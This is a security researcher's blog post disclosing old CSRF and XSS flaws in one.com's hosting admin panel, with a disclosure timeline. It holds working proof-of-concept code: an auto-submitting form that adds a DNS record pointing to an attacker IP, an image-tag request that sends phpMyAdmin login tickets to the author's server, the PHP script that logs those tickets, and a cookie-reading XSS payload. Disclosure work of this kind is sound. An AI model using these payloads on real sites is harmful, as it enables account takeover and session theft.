One.com CSRF and XSS

About a year ago I found a few vulnerabilities on the one.com website. For those of you that don't know, one.com is a fairly big and cheap hosting provider in Scandinavia. I reported the issues, but some have not been fixed yet. Since it's been so long and one.com went silent in our communication, I've decided to disclose the following vulnerabilities.

They're old and mostly don't work any longer, but they might be interesting still.

CSRF

At first, pretty much every function on the site for administrating your website was vulnerable to CSRF. I made a basic demo which changed the DNS settings of the user's site which I sent to the staff.

dnsrecordadd.html (Source)

<script type="text/javascript" src="jquery-1.7.1.min.js"></script>

<form method="post" action="https://www.one.com/admin/dns-web-overview.do">
        <input type="hidden" name="subDomain" value='www'>
        <input type="hidden" name="type" value='WebAlias'>
        <input type="hidden" name="value" value='<evil ip address>'>
        <input type="hidden" name="advanced" value='true'>
        <input type="submit" name="AddSetting" value='Add+DNS+settings' id="csrfgo">
</form>

<script type="text/javascript">
        $(document).ready(function() {
                setTimeout(function() {
                        $("#csrfgo").click();
                }, 2000);
        });
</script>

This vulnerability was confirmed and was fixed pretty early.

Another vulnerabilty was in a redirect function which took the user from the admin interface at one.com/admin/ to the phpmyadmin interface. As a nice user-friendly touch it bypasses the authentication by the means of a generated ticket which it sent attached to a custom url in the phpMyAdmin application. By manipulating the url I managed to send the authentication ticket to my own server instead. Using CSRF I could then harvest a live ticket from a users session to gain access to their phpMyAdmin instance.

ticket.html (Source)

<img src="https://www.one.com/admin/ticketredirect.do?url=http%3A%2F%2Fuddholm.com%2Fjoakim%2Fone%2Fticket.php&encode=UTF-8">

The url it redirects to contained a basic php script to dump the ticket from url and display a nice picture to lull the user. This way the image tag still loaded too. Yay!

ticket.php (Source)

<?php

file_put_contents("tickets.txt", $_GET['ticket'] . "\n", FILE_APPEND);

$name = 'ohnoes.jpg';
$fp = fopen($name, 'rb');

header("Content-Type: image/jpg");
header("Content-Length: " . filesize($name));

// dump the picture and stop the script
fpassthru($fp);

?>

Using the ticket you could then gain access at the original redirect endpoint to the PHPMyAdmin site.

XSS

I also found some XSS in the premade blog and gallery websites which one.com provides for you. These are likely not enabled by the user though and the ones I found were reflected via POST. Here is an example exploit:

blogforgotpassword.html (Source)

<script type="text/javascript" src="jquery-1.7.1.min.js"></script>

<form method="POST" action="http://iloapp.opol.com/blog/blog?ResetPassword">
        <input type="hidden" name="email" value='       "><body onload="alert(document.cookie)"></body>'>
        <input type="hidden" name="x" value='48'>
        <input type="hidden" name="y" value="15">
        <input type="submit" id="csrfgo">
</form>

<script type="text/javascript">
        $(document).ready(function() {
                $("#csrfgo").click();
        });
</script>

Status

Contact attempt #1: 2013-03-21 CSRF.

One.com response: 2013-03-21 Confirmed issue.

PHPmyAdmin CSRF and minor xss: 2013-03-23

Contact attempt #2 after no fix: 2013-04-21

Queue nearly a year of no changes

The CSRF holes I found have been fixed or deprecated/removed in the new admin-interface. The minor XSS still remains to be fixed.